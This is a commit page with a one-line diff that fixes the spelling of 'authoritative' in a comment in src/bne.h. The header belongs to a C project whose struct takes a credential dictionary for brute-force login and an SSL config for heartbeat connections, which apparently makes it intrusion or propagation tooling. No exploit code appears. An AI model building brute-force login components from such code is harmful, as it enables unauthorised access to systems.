diff options
author | David Timber <dxdt@dev.snart.me> | 2022-11-05 19:19:30 +0800 |
---|---|---|
committer | David Timber <dxdt@dev.snart.me> | 2022-11-05 19:19:30 +0800 |
commit | 1fb630b7df7d65c436f7486266671f9eb942067c (patch) | |
tree | 4f228620ce23f3158760a4f19bb7c1dd044269c1 /src/bne.h | |
parent | bd69f1e9afca387f1c143e14d553c42b88aca20b (diff) |
Doc and source comment spelling check
Diffstat (limited to 'src/bne.h')
-rw-r--r-- | src/bne.h | 2 |
1 files changed, 1 insertions, 1 deletions
@@ -93,7 +93,7 @@ typedef enum prne_bne_vector prne_bne_vector_t; struct prne_bne_param { // The cred dict to use for brute force login (optional) const prne_cred_dict_t *cred_dict; - // The SSL config object for authoritive heartbeat client connections + // The SSL config object for authoritative heartbeat client connections // (optional) mbedtls_ssl_config *htbt_ssl_conf; /** |